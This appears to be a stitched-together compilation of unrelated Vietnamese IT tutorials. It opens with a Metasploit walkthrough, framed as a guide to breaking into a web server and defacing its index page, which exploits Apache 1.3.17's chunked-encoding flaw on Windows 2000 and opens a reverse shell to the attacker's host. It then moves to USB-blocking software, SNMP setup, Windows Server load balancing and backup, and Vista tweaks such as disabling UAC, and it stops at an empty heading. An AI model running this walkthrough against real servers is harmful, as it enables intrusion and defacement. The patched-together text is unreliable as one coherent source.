Su dung Metasploit Framework
Xem xét toàn cảnh
Như chúng ta đã biết, muốn khai thác hệ thống để phá hoại cần phải đáp ứng được một số tiêu chuẩn nhất định. Bạn có thể gọi nó là hàng loạt vấn đề cũng được. Liệu dịch vụ có lỗ hổng hay không, liệu nó có bộc lộ ở web hay không, và liệu…. Bạn sẽ phải vẽ ra một bức tranh cụ thể cho mình. Những hoạt động thực tiễn chúng ta sẽ làm với tất cả các bước cần thiết để xâm nhập một web server, sau đó upload phiên bản index.html riêng lên server. Chúng ta sẽ phải lên danh sách các hoạt động cần phải làm tương ứng với hệ điều hành và kiểu web server.
Tôi đã thực hiện cuộc phá hoại minh hoạ này trong phòng làm việc tại nhà với hai laptop. Một máy cài hệ điều hành SuSE Linux, máy còn lại cài Windows 2000 Professional. Trong laptop W2K tôi cài web server nguồn mở Apache phiên bản 1.3.17. Có một số phiên bản nhiều lỗ hổng khác ra đời sau 1.3.17 nhưng chúng ta sẽ dùng phiên bản này làm ví dụ bởi vì nó có lỗ hổng mã hoá chắc chắn.
Nội dung chi tiết
Tất cả dường như có vẻ ổn, nhưng bạn mới chỉ xác định được vị trí mã nguồn để khai thác? Không chỉ có thể, bạn biết chắc chắn rằng không có các thành phần “giá trị bổ sung” trong mã khai thác hay không? Để đơn giản hoá tôi dùng Metasploit Framework. Framework này được đặt chung với HDM và spoonm. Nó còn là bản miến phí dành cho mọi người. Tính năng nâng cao khi dùng công cụ này là bạn có thể khai thác an toàn tất cả các lỗ hổng kèm theo mà không phải sợ bất kỳ backdoor nào. Framework này có thể dùng trong cả môi trường Linux hoặc win32. Bạn có thể có sự lựa chọn riêng cho mình, còn trong ví dụ này tôi dùng Linux vì server tftp đang chạy trên nó. Server này sẽ được dùng trong các hoạt động minh hoạ thử nghiệm của cả bài.
Các yêu cầu cho hoạt động tấn công một trang web đã nói ở trên gồm:
Metasploit Framework để khởi động quá trình khai thác.
Windows 2000 Professional cài đặt Apache 1.3.17.
Hai laptop kết nối với nhau qua một switch.
Metasploit
Trong phần một chúng ta sẽ xem xét sơ lược về Metasploit. Ở phần hai các bạn sẽ được hướng dẫn chi tiết từng bước cách sử dụng. Chúng tôi sẽ cung cấp một số thông tin giúp bạn có được sự hình dung ban đầu về nó. Trong bài này tôi dùng Metasploit trong Linux.
Dưới đây là toàn bộ thư mục và file tạo một lần trong Framework không bị nén.
don@linux:~/framework-2.2> dir
total 107
drwxr-xr-x 2 500 10000 112 2004-08-07 17:50 data
drwxr-xr-x 2 500 10000 744 2004-08-07 17:50 docs
drwxr-xr-x 2 500 10000 280 2004-08-07 17:50 encoders
drwxr-xr-x 2 500 10000 1288 2004-08-07 17:50 exploits
drwxr-xr-x 2 500 10000 144 2004-08-07 17:50 extras
drwxr-xr-x 6 500 10000 208 2004-08-07 17:50 lib
-rwxr-xr-x 1 500 10000 4687 2004-07-29 23:41 msfcli
-rwxr-xr-x 1 500 10000 22975 2004-07-29 23:41 msfconsole
-rwxr-xr-x 1 500 10000 5744 2004-07-05 06:52 msfdldebug
-rwxr-xr-x 1 500 10000 5639 2004-07-29 23:41 msfencode
-rwxr-xr-x 1 500 10000 1538 2004-08-07 17:58 msflogdump
-rwxr-xr-x 1 500 10000 2104 2004-07-29 23:41 msfpayload
-rwxr-xr-x 1 500 10000 9361 2004-07-27 03:38 msfpayload.cgi
-rwxr-xr-x 1 500 10000 6952 2004-07-29 23:41 msfpescan
-rwxr-xr-x 1 500 10000 12096 2004-08-08 04:37 msfupdate
-rwxr-xr-x 1 500 10000 16116 2004-08-07 18:31 msfweb
drwxr-xr-x 2 500 10000 120 2004-08-07 18:17 nops
drwxr-xr-x 3 500 10000 1664 2004-08-07 17:50 payloads
drwxr-xr-x 3 500 10000 168 2004-08-07 17:50 sdk
drwxr-xr-x 3 500 10000 80 2004-08-07 17:50 src
drwxr-xr-x 2 500 10000 216 2004-06-07 04:21 tools
don@linux:~/framework-2.2>
Còn phần dưới là cách thu hồi Framework và msfconsole cụ thể.
don@linux:~/framework-2.2> ./msfconsole
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ v2.2 \/ \/ |__|
+ — –=[ msfconsole v2.2 [30 exploits - 33 payloads]
phần 2
Từ lý thuyết đến thực tế
Từ lý thuyết đến thực tế
Chúng ta sẽ tiếp tục với công cụ Metasploit và cách sử dụng nó. Trước hết là tăng mức hệ thống truy cập vào Web server Apache. Khi bạn thấy lớp ngoài đảo ngược, bạn có thể upload file index.html đã được thay đổi. Nó sẽ trở thành trang mặc định được đưa lên server, chẳng hạn như bản dữ liệu log của công ty bạn.
Phần bên dưới cho biết điều gì thu được sau câu lệnh “show exploits” (đưa ra các lỗ hổng) khi bạn nhập nó ở màn hình lệnh prompt msf trong Metasploit. Danh sách các lỗi hổng có thể khai thác được đưa ra:
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
Bạn có thể thấy một số lỗ hổng có thể khai thác bên trong framework đã đưa ra. Danh sách trên đã được cắt bớt. Nếu bạn nhập cùng một lệnh như vậy, bạn sẽ có được danh sách đầy đủ. Chúng ta sẽ thử nghiệm với lỗ hổng thứ hai từ trên xuống: apache_chunked_win32.
Bây giờ nhập lệnh để chọn lỗ hổng chúng ta sẽ dùng như sau:
msf > use apache_chunked_win32
msf apache_chunked_win32 >
Như bạn thấy ở trên, màn hình lệnh prompt xuất hiện trở lại, báo lại cho bạn biết lỗ hổng đã được chọn để dùng: apache_chunked_win32. Tiếp theo là lệnh kiểm tra các tuỳ chọn khác nhau gắn kèm với lỗ hổng dưới framework này.
msf apache_chunked_win32 > show options
Exploit Options
===============
Exploit Name Default Description
——– —— ——- ——————
optional SSL Sử dụng SSL
required RHOST Địa chỉ đích
required RPORT 80 Cổng đích
Target: Windows NT/2K Brute Force
msf apache_chunked_win32 >
Màn hình lệnh xuất hiện trở lại với danh sách các tuỳ chọn chúng ta cần điền đầy đủ như địa chỉ IP host từ xa. Chú ý là bạn cũng cần phải nhập địa chỉ IP host cục bộ, ví dụ như địa chỉ các máy tấn công của bạn trong môi trường thử nghiệm. Bạn cần nhập lệnh thiết lập các tuỳ chọn đó như sau:
msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >
Chúng ta sẽ xem tuỳ chọn LHOST ở phần sau trong bài này.
Bạn thấy gì từ các tuỳ chọn khai thác lỗ hổng?
Bây giờ chúng ta sẽ thiết lập giá trị cho trường này. Sau đó tiếp tục thực hiện dần dần với các tuỳ chọn khác nhau khác trước khi sử dụng lỗ hổng để tăng mức truy cập hệ thống trên Web server. Ở đây bạn sẽ dùng lệnh sau để xem chúng ta có thể dùng được loại payload nào:
msf apache_chunked_win32 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_bind
Windows Bind Shell
win32_bind_dllinject
Windows Bind DLL Inject
win32_bind_stg
Windows Staged Bind Shell
win32_bind_stg_upexec
Windows Staged Bind Upload/Execute
win32_bind_vncinject
Windows Bind VNC Server DLL Inject
win32_reverse
Windows Reverse Shell
win32_reverse_dllinject
Windows Reverse DLL Inject
win32_reverse_stg
Windows Staged Reverse Shell
win32_reverse_stg_ie
Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec
Windows Staged Reverse Upload/Execute
win32_reverse_vncinject
Windows Reverse VNC Server DLL Inject
msf apache_chunked_win32 >
Lựa chọn trên cho phép sử dụng bất kỳ phần nào bạn chọn. Có nghĩa là bạn sẽ có thể thực thi bất kỳ playload nào đã chọn bằng CPU của máy nạn nhân khi khai thác lỗ hổng bạn đang nhắm đến. Có thêm lựa chọn mở rộng này là một trong nhiều cách dùng tuyệt vời của công cụ bảo mật.
Có rất nhiều lựa chọn dành cho bạn. Ở trường hợp của chúng ta là win32_reverse payload vì nó giúp tạo ra được lớp vỏ bên ngoài, cho phép sử dụng được nhiều lần khai thác để tấn công. Để rõ hơn bạn có thể copy lại file index.html và điều chỉnh nó bằng cách thay đổi giao diện. Xây dựng được lớp bên ngoài cho phép chúng ta thực hiện điều đó. Còn Framework bạn có tuỳ chọn payload thì sao? Hãy xem cú pháp bên dưới:
msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >
Bây giờ chúng ta đã thiết lập thông số cho payload và quay trở lại màn hình lệnh. Tiếp theo là thiết lập địa chỉ IP để nhận lớp ngoài đảo ngược. Thiết lập cho host nhận cũng tương tự như một vài bước biết lập cho RHOST trước đây để đặc tả máy sẽ tấn công. Thực hiện như sau:
msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >
Bây giờ chúng ta đã thực sự sẵn sàng khởi động lỗ hổng. Cú pháp như sau:
msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
[*] Starting Reverse Handler.[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348…[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348…[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352…[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352…[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356…[*] Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356…[*] Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360…[*] Got connection from 192.168.1.101:1031
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache>
Từ trên bạn có thể thấy màn hình lệnh trong thư mục Apache. Có một tuỳ chọn khác chúng ta có thể sử dụng để đặc tả hệ điều hành đang dùng trong trường hợp này là “target”. Ngay cả khi bạn không mô tả tường minh, nó cũng sẽ cố gắng “thu xếp” để thực hiện những việc nó có thể làm. Để dùng tuỳ chọn target (đích), thực hiện như sau:
msf apache_chunked_win32(win32_reverse) > show targets
Danh sách các đích (target) sẽ được đưa ra. Tất cả việc bạn cần làm là chọn thứ bạn muốn và thiết lập nó như đã làm ở trên:
msf apache_chunked_win32(win32_reverse) > set TARGET 1
Câu lệnh trên nhập đích thứ nhất nếu server bộ nhớ là W2K Pro,
Công việc đến đây có thể nói là đã hoàn thành. Web server Apache bây giờ đã bị bạn xâm hại và có phần bên ngoài đảo ngược. Bạn hoàn toàn có quyền kiểm soát và thao tác trên nó.
SecureIt Easy Bảo mật dữ liệu bằng cách chặn các kết nối trái phép qua cổng USB
 Ổ đĩa USB, thẻ nhớ hiện nay rất phổ biến do gọn nhẹ, dễ sao chép chia sẻ, giá của USB ngày càng giảm do đó USB là một vật bất ly thân đối với các thần dân download tài liệu, âm nhạc, phần mềm hay video. |
|
Cũng chính vì sự tiện dụng, gọn nhẹ, dễ sao chép mà chúng ta cũng gặp phải những rắc rối do chúng mang lại như: mất dữ liệu do sao chép không được sự đồng ý của bạn, nguy cơ lây nhiễm virut qua USB ( virut Autorun,…). Để tự bảo vệ mình các bạn thường dùng các phần mềm như Disk Drive Protector, Disable USB hay các phần mềm có tác dụng chặn hết các kết nối qua cổng USB. Nếu bạn chặn hết các cổng USB thì cũng bất tiện cho chính bạn, đó là chương trình đó cũng chặn luôn, không cho phép bạn sử dụng USB của bạn trên chính máy bạn, muốn sử dụng được USB thì bạn lại phải mở lại cổng USB bằng phần mềm, khởi động lại máy thì mới có thể sử dụng được USB. Trong trường hợp bạn vừa muốn bảo vệ dữ liệu của mình, tránh được virut lây qua USB và sử dụng được USB của mình một cách bình thường thì bạn có thể sử dụng đến phần mềm SecureIt Easy. SecureIt Easy là một phần mềm rất thông minh , SecureIt Easy có thể phân biệt được USB của địch và USB của ta, nếu là USB của ta thì SecureIt Easy sẽ cho phép sử dụng, nếu là USB của địch thì SecureIt Easy sẽ từ chối và đòi hỏi phải có mật khẩu thì mới cho phép sử dụng USB. Sở dĩ SecureIt Easy có thể phân biệt được USB của ta và của địch là do SecureIt Easy quản lý USB ở số Serial Number của USB. Serial Number của USB là số riêng, hoàn toàn khác nhau ở từng hãng sản xuất ra USB nên sẽ không thể có 2 USB cùng số Serial Number. Dựa vào số Serial Number có hoặc không có trong danh sách mà SecureIt Easy sẽ từ chối hoặc cho phép sử dụng USB. 1. Cài đặt SecureIt Easy chạy trên nền Microsoft .NET Framework Version 2.0, đó đó nếu máy chưa được cài Microsoft .NET Framework Version 2.0 thì bạn download tại http://tinyurl.com/amxh8. Sau khi cài đặt xong Microsoft .NET Framework Version 2.0 thì bạn tiến hành cài đặt SecureIt Easy. SecureIt Easy sẽ có biểu tượng chiếc mũ bảo hiểm mầu trắng ở khay hệ thống (system tray). 2. Sử dụng. ở lần đầu tiên khi bạn cắm USB vào máy tính thì SecureIt Easy sẽ hiện bảng thông báo Security Warning.
Bạn click chuột phải vào biểu tượng của SecureIt Easy và chọn Settings
Trong Devices, bạn click vào Status để chọn USB cho phép sử dụng, sau đó click vào Apply Changes, click Close để thoát ra. Những USB nào được phép sử dụng sẽ có màu xanh, những USB nào chưa ( không ) được phép sử dụng sẽ có màu đỏ. Nếu bạn muốn bỏ không cho USB này lần sau được sử dụng nữa, bạn click bỏ chọn (khi này Usb đang sẽ có màu xanh) vào USB đó click vào Apply Changes, click Close. Sau khi xác nhận những USB nào có trong danh sách được phép sử dụng thì khi cắm usb vào máy sẽ sử dụng được ngay, những USB,thẻ nhớ, máy ảnh,… nào không có trong danh khi cắm vào cổng USB đều nhanh chóng bị tắt và không sử dụng được, bạn không thể tìm thấy USB đó trong Device Manager hay My Computer. Để tránh người khác thiết lập lại cho phép USB của mình được phép sử dụng bạn nên đặt mật khẩu để bảo vệ SecureIt Easy. Bạn chuyển qua thẻ Settings\General Settings và click vào mục Changge Password trong Security – Application Password Protection. Vì là ở lần đầu tiên nên bạn sẽ nhập mật khẩu vào ô New password, nhập lại mật khẩu vào ô Confim new password và câu gợi ý khi quên mật khẩu vào ô Password hint, click Ok 2 lần và click Apply Changes để lưu lại mật khẩu.
Để tạm thời vô hiệu hóa chức năng chặn các kết nối trái phép qua cổng USB bạn làm như sau click vào thẻ Settings\General Settings, click vào Stop trong Service Control click Apply Changes, Close để lưu lại và thoát, khi nào muốn chặn các kết nối trái phép thì bạn chọn Start vẫn trong Service Control .
Ngoài chức năng chặn kết nối trái phép SecureIt Easy còn có thêm 2 chức năng là theo dõi USB nào đã được cắm trái phép vào thời gian nào trong Reporting.
Và gửi thông báo khi có thiết bị USB lạ nào cắm vào máy tính trong mục Email Notification\ Enble email notification, bạn cần nhập vào địa chỉ mail của bạn, địa chỉ mail nhận báo cáo ( cũng của bạn), tiêu đề và địa chỉ máy chủ gửi thư, bạn nhập user và password của máy chủ gửi thư.
Tính năng này tuy khá hữu dụng nhưng chỉ dùng được với các máy không sử dụng chương trình đóng băng và luôn luôn có kết nối mạng. vì nếu sử dụng chương trình đóng băng và không có kết nối mạng thì tính năng này là thừa vì không thể lưu lại log đã có usb nào cắm trái phép và không thể gửi email báo cáo được. Tải bản đầy đủ tại: |
Cấu hình SNMP
Nội dung
1. Giới thiệu
2. Cấu hình SNMP
3. Tham khảo
Giới thiệu
SNMP: Simple Network Management Protocol
Cấu hình SNMP
Phần 1: Cài đặt snmp
Cài những gói net-snmp, net-snmp-utils
Cho người dùng FC:
# yum install net-snmp net-snmp-utils
Phần 2: Cấu hình
Chỉnh sửa file cấu hình snmpd.conf (FC user: /etc/snmp/snmpd.conf)
Trích dẫn:
| ########################################### # Access Control (Quyền truy nhập thông tin) ########################################### # First, map the community name “public” into a “security name” # thay “MậtkhẩuSNMP” bằng một chuỗi ký tự com2sec local localhost MậtkhẩuSNMP com2sec myLAN 192.168.1.0/24 MậtkhẩuSNMP# Second, map the security name into a group name: # RWGroup: quyền đọc/viết (Read, Write) # ROGroup: chỉ có quyền đọc (Read Only) group RWGroup v1 local group RWGroup v2c local group RWGroup usm local group ROGroup v1 myLAN group ROGroup v2c myLAN group ROGroup usm myLAN# Third, create a view for us to let the group have rights to: view all included .1 80# Finally, grant the group read-only access to the systemview view. # group context sec.model sec.level prefix read write notif access ROGroup “” any noauth exact all none none access RWGroup “” any noauth exact all all none ############################## ####################################### ############################################ |
Phần 3: Khởi động snmpd
Cho người dùng FC
// tự động chạy mỗi khi bật máy
# chkconfig –level 3 snmpd on
// khởi động cho lần đầu tiên
# /etc/init.d/snmpd start
Phần 4: Kiểm tra hoạt động
Sử dụng lệnh snmpwalk để xem một số thông tin hệ thống
Trích dẫn:
| // ———————————– // phần memory còn thừa (chưa sử dụng) $snmpwalk -v 1 -c MậtkhẩuSNMP localhost .1.3.6.1.4.1.2021.4.6.0 // kết quả: 120 MB RAM chưa sử dụng UCD-SNMP-MIB::memAvailReal.0 = INTEGER: 120400// ———————————– // dung lượng HDD, / partition $ snmpwalk -v 1 -c MậtkhẩuSNMP localhost .1.3.6.1.4.1.2021.9.1.9.1 // kết quả: đã sử dụng 13% UCD-SNMP-MIB::dskPercent.1 = INTEGER: 13// ———————————– // số user đang login vào hệ thống $ snmpwalk -v 1 -c MậtkhẩuSNMP localhost hrSystemNumUsers.0 // có 70 users HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 70// ———————————– // số TCP connection đang mở $ snmpwalk -v 1 -c MậtkhẩuSNMP localhost .1.3.6.1.2.1.6.9.0 // có 123 open connections TCP-MIB::tcpCurrEstab.0 = Gauge32: 123 |
Tham khảo, thông tin thêm
1. Xem MIB tree: Mbrowse is an SNMP MIB browser based on GTK and net-snmp. It is released under the GPL.
Network Load Balancing 2008
I. Giới thiệu - Như chúng ta đã biết trong hệ thống mạng khi cần cân bằng tải cho những dịch vụ như: Web, Mail, FTP, VPN, File, Print service… thì chúng ta cần phải cấu hình hệ thống Load Balancing hoặc Clustering
- Trong bài viết này tôi sẽ giới thiệu với các bạn cách cấu hình dịch vụ Network Load Balancing trên Windows Server 2008 để cân bằng tải cho hệ thống Web
Bài lab bao gồm các bước:
1. Cài đặt Network Load Balancing
2. Cấu hình Network Load Balancing
3. Máy Client kiểm tra
II. Chuẩn bị
III. Mô hình
Bước 2: Add Web Server 2 vào Cluster
- Trong hộp thoại Add Host to Cluster: Connect, nhập địa chỉ của Web Server 2 (192.168.3.21) vào ô Host, chọn Connect
Bước 3: Kiểm tra trên 2 máy Web Server
3. Máy Client kiểm tra truy cập vào Web Site của 2 Web Server
6. Máy Client kiểm tra truy cập vào Web Site bằng Cluster Virtual IP
8. Stop Default Web Site của Web Server 2
Windows Sever 2008 backup
- Windows Server Backup là một Feature trên Windows Server 2008 cung cấp chức năng lưu trữ (backup), phục hồi (restore) dữ liệu và phục hồi hệ thống (Operating System Volume Recovery)
- Mục đích của bài lab là hướng dẫn cài đặt và sử dụng Windows Server Backup để lưu trữ, phục hồi dữ liệu và phục hồi hệ thống
- Bài lab gồm các bước:
1. Cài đặt Windows Server Backup
2. Backup Full Server
3. Restore File và Folder
4. Operating System Volume Recovery
- Trong cửa sổ Confirmation, chọn Recover
10 cách “hack” Windows Vista
Bạn đang chạy Windows Vista và muốn sử dụng giao diện mĩ miều của Aero. Nhưng có thể bạn sẽ phải “hack” cấu trúc bên trong của Vista để có thể thấy được giao diện đó.
Có rất nhiều cách để có thể hack Windows Vista và đây là 10 cách trong số đó. Bạn có thể chỉnh sửa bất cứ cái gì, từ tốc độ của Windows Aero tới mở khóa tài khoản quản trị siêu ẩn, kích hoạt nội dung menu chuột phải… thậm chí có thể tấn công tới cả quyền điều khiển tài khoản người dùng (User Account Control). Vì vậy nếu bạn thực sự muốn điểu khiển được Windows Vista, hãy tập trung vào để đọc bài này.
Cảnh báo: Một vài mẹo trong bài này đòi hỏi phải chỉnh sửa Windows Registry (nó sẽ gây ra một số điều nguy hiểm cho máy tính), vì vậy trước khi đụng chạm tới Registry, bạn hãy sử dụng System Restore để tạo một điểm khôi phục để có thể khôi phục lại máy tính khi cần thiết. Để tạo điểm khôi phục trong Windows Vista, bạn chọn Control Panel > System and Maintenance > Restore files from backup > Create a restore point or change settings
I. Hack User Account Control
User Account Control (UAC) của Windows Vista là một tính năng bị mọi người chê trách nhiều nhất trong hệ điều hành mới này. Chắc chán một điều là nó giúp cho bạn được bảo vệ tốt hơn nhưng đôi khi lại gây ra quá nhiều phiền hà.
Nếu bị các drive UAC luôn làm phiền, bạn có thể tắt nó đi. Có vài cách để làm được việc đó và một trong số cách đó như sau: chọn Control Panel > User Accounts and Family Safety > User Accounts, sau đó kích vào Turn User Account Control on or off.
Bạn có thể sử dụng cách khác là chạy System Configuration Utility bằng cách nhập msconfig vào phần dòng lệnh hoặc vào ô search trong menu Start. Khi công cụ này chạy, chọn tab Tools và kéo thanh trượt xuống cho đến khi nhìn thấy Disable UAC. Chọn nó và kích vào nút Launch, sau đó khởi động lại máy. Để bật UAC trở lại bạn hãy làm các bước tương tự nhưng chọn Enable UAC.
Nếu là một người thích chỉnh sửa Registry, bạn có thể vô hiệu hóa UAC thông qua Registry Editor. Để khởi chạy Registry Editor, nhập regedit vào ô Search trong menu Start hoặc trên cửa sổ lệnh, nhấn Enter và vào nhánh sau:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\
Policies\System\EnableLUA
Đặt cho giá trị của nó là 0. Bạn sẽ cần khởi động lại máy sau khi đã thay đổi Registry.
UAC chỉ làm phiền trong những tài khoản thường sử dụng của Windows Vista. Khi chạy một vài câu lệnh từ cửa sổ lệnh, bạn sẽ được nhắc là không đủ quyền quản trị thực sự để chạy chúng, thậm chí cả khi đang truy cập với một tài khoản quản trị.
Đó là lý do tại sao UAC yêu cầu bạn chạy cửa sổ lệnh như một quản trị viên để có thể gọi hoạt động của cửa sổ lệnh nâng cao. Nếu đơn giản chỉ truy cập với quyền quản trị viên là không đủ, mặc dù vậy bạn vẫn có thể truy cập cửa sổ lệnh nâng cao.
Có một cách để làm điều đó là gõ cmd vào ô Search trên menu Start, kích chuột phải vào biểu tượng cửa sổ lệnh xuất hiện ở phía trên menu Start, chọn Run as administrator.
Nhưng nếu bạn muốn sử dụng được cửa sổ lệnh nâng cao mỗi khi chạy cửa sổ lệnh thông thường? Rất đơn giản. Bạn chỉ cần tạo một shortcut cửa sổ lệnh nâng cao trên nền desktop hoặc gắn nó lên menu Start.
Để tạo shortcut trên destop làm như sau:
1. Kích chuột phải vào nền desktop, chọn New > Shortcut.
2. Trong ô trống trên cửa sổ Create Shortcut, nhập vào cmd và kích Next.
3. Trên cửa sổ tiếp theo, nhập vào tên của shortcut (ví dụ là Elevated Command Prompt), sau đó kích Finish.
4. Kích chuột phải vào shortcut vừa tạo chọn Properties
5. Chọn tab Shortcut và kích vào nút Advanced.
6. Chọn ô tương ứng với phần Run as administrator, kích OK và sau đó OK lần nữa.
Giờ thì nếu bạn muốn chạy cửa sổ lệnh nâng cao bất cứ lúc nào, chỉ cần kích đúp vào shortcut đã tạo. Nếu muốn biểu tượng khởi chạy đó có trên menu Start, bạn chỉ cần kéo nó từ nền Desktop lên nút Start và đặt nó tại vị trí mà bạn muốn.
II. Mở khóa tài khoản quản trị siêu ẩn
Sâu bên trong Windows Vista có một tài khoản quản trị ẩn. Nó hoàn toàn khác so với tài khoản quản trị thông thường mà bạn thường thiết lập trên PC. Tài khoản này không phải là một phần trong nhóm quản trị. Nó là một loại “siêu quản trị”, gần giống như tài khoản gốc trong Unix và mặc định nó luôn được tắt và ẩn.
Trong các phiên bản trước Windows Vista, tài khoản quản trị luôn ẩn và rất nhiều người sử dụng nó như một tài khoản chính duy nhất. Tài khoản này luôn có toàn quyền đối với máy tính.
Trong Windows Vista, Microsoft đã thay đổi. Tài khoản quản trị ẩn không lệ thuộc vào UAC nhưng tài khoản quản trị thông thường thì có. Vì vậy, tài khoản quản trị ẩn có thể tạo bất kỳ thay đổi nào đối với hệ thống như bạn đã thấy trong phần các câu lệnh UAC.
Việc bật tài khoản quản trị ẩn này rất dễ dàng. Đầu tiên bạn mở cửa sổ lệnh nâng cao bằng cách trên (nếu đã tạo shortcut thì việc này càng đơn giản)
Sau đó nhập vào câu lệnh sau rồi nhấn Enter: Net user administrator /active:yes
Vậy là từ giờ, tài khoản quản trị ẩn sẽ luôn được hiển thị như một lựa chọn trên màn hình Welcome như bất kỳ các tài khoản user khác mà bạn đã thiết lập. Việc sử dụng nó cũng như bất kỳ tài khoản nào khác. Khi mới bật lên thì tài khoản này sẽ chưa có password, vì vậy đầu tiên bạn nên thiết lập password cho nó.
Nếu muốn vô hiệu hóa và ẩn tài khoản quản trị ẩn đi, nhập vào câu lệnh sau trên cửa sổ lệnh nâng cao và nhấn Enter: Net user administrator /active:no
III. Sử dụng giao diện “gương” Aero
Các đường viền xung quanh cửa sổ hệ thống (như đường viền của hộp thoại hay cửa sổ Control Panel) nhìn trong suốt trong giao diện Aero của Windows Vista
Để chỉnh sửa đường viền rộng hơn hay hẹp hơn:
1. Kích chuột phải vào nền desktop và chọn Personalize.
2. Kích chọn Window Color and Appearance.
3. Chọn Open classic appearance properties for more color options.
4. Từ cửa sổ xuất hiện, hãy đảm bảo rằng Windows Aero được chọn như hệ thống màu sẵn có. Kích vào nút Advanced trên phần bên phải của cửa sổ. Hộp thoại Advanced Appearance sẽ xuất hiện.
5. Chọn Border Padding trên menu lựa chọn Item. Để thay đổi kích thước của đường viền, bạn hãy nhập giá trị kích thước mới cho đường viền (mặc định là 4). Kích OK hai lần. Kích thước của các đường viền sẽ được thay đổi ngay.
Có nhiều cách để có thể thực hiện tương tự với đường viền. Để thay đổi màu, độ trong suốt của đường viền… kích chuột phải vào nền màn hình, chọn Personalize > Window Color and Appearance.
1. Chọn màu cho cửa sổ ở phần trên của màn hình, hoặc tự tùy chỉnh màu bằng cách kích vào Show color mixer và sau đó di chuyển các thanh trượt để có được màu ưa thích.
2. Để thay đổi độ trong suốt của đường viền cửa sổ, di chuyển thanh trượt Color intensity về phía bên trái hoặc bên phải.
IV. Bảo vệ bảo mật riêng tư bằng cách gỡ bỏ siêu dữ liệu Windows Vista
Một trong các tính năng hữu ích nhất của Vista cũng là một trong những tính năng nguy hiểm nhất – tính hữu ích của siêu dữ liệu. Siêu dữ liệu là thông tin về các file mà bạn không trông thấy một cách bình thường nhưng có thể giúp để dễ dàng tìm kiếm chúng.
Ví dụ, đặc trưng của các file nhạc là có chứa tên của người sáng tác, loại nhạc… Một file ảnh thì thường chứa dữ liệu thời gian chụp, người chụp, loại máy và nhiều thông tin khác như tốc độ ISO. Các văn bản, bảng tính thì có chứa nhiều thông tin mở rộng khác nhau về người tạo ra văn bản đó (bao gồm người tạo, thời gain tạo và chỉnh sửa, người xem…
Trong nhiều trường hợp, các chương trình tự động sinh ra các thông tin siêu dữ liệu của người sở hữu khi file được tạo. Người dùng có thể dễ dàng tạo và chỉnh sửa siêu dữ liệu bằng cách kích chuột phải vào file, chọn Properties và chọn tab Details. Sau đó kích vào bất kỳ trường nào và nhập lại trong siêu dữ liệu. Có một số thông tin phải được giữ lại, như thời gian file được in, không thể thay đổi.
Siêu dữ liệu này có thể khá hữu ích bởi Windows Vista có thể tìm kiếm bằng cách sử dụng các thông tin đó. Ví dụ, nếu muốn tìm kiếm mọi bài hát của Mozart trên máy tính, bạn chỉ cần nhập Mozart vào ô tìm kiếm và Vista sẽ tìm trong siêu dữ liệu ra tất cả các bài hát của Mozart.
Nhưng trong một số trường hợp, bạn lại không muốn các siêu dữ liệu trong file của mình bị người khác xem được. Ví dụ, nhà phân tích của hãng Gartner Inc. đã chỉ ra rằng doanh nghiệp phải nhúng siêu dữ liệu vào trong các file về một khách hàng, và doanh nghiệp tất nhiên sẽ không muốn người nào khác nhìn thấy chúng. Có một vài cách đơn giản để cá nhân hóa siêu dữ liệu trong các tài liệu của bạn, những thông tin mà bạn không muốn ai thấy.
Thật dễ dàng để bỏ bất kỳ siêu dữ liệu nào từ bất kỳ file nào:
1. Mở Windows Explorer và kích chuột phải vào file.
2. Chọn Properties
3. Chọn tab Details. Một màn hình hiển thị siêu dữ liệu của tài liệu sẽ xuất hiện như hình dưới.
4. Kích vào liên kết Remove Properties and Personal Information ở phía dưới của cửa sổ. Hộp thoại Remove Properties sẽ xuất hiện.
5. Chọn Remove the following properties from this file và kích các ô tương ứng với siêu dữ liệu mà bạn muốn bỏ. Kích OK. Các siêu dữ liệu được lựa chọn sẽ bị gỡ bỏ.
6. Ngoài ra còn một lựa chọn giúp bạn có thể tạo một bản sao của tài liệu với tất cả các siêu dữ liệu đều bị bỏ. Chọn Create a copy with all possible properties removed và kích OK.
Bạn có thể bỏ siêu dữ liệu từ nhiều file cùng một lúc. Lựa chọn tất cả các file mà bạn muốn bỏ siêu dữ liêu, kích chuột phải vào chúng và làm theo hướng dẫn như trên. Hoàn toàn hợp lệ để có thể thực hiện điều này, tuy vậy, những file đó phải có cùng các trường siêu dữ liệu để có thể gõ bỏ cùng một lúc.
V. Tăng khả năng của menu ngữ cảnh trong Windows Vista
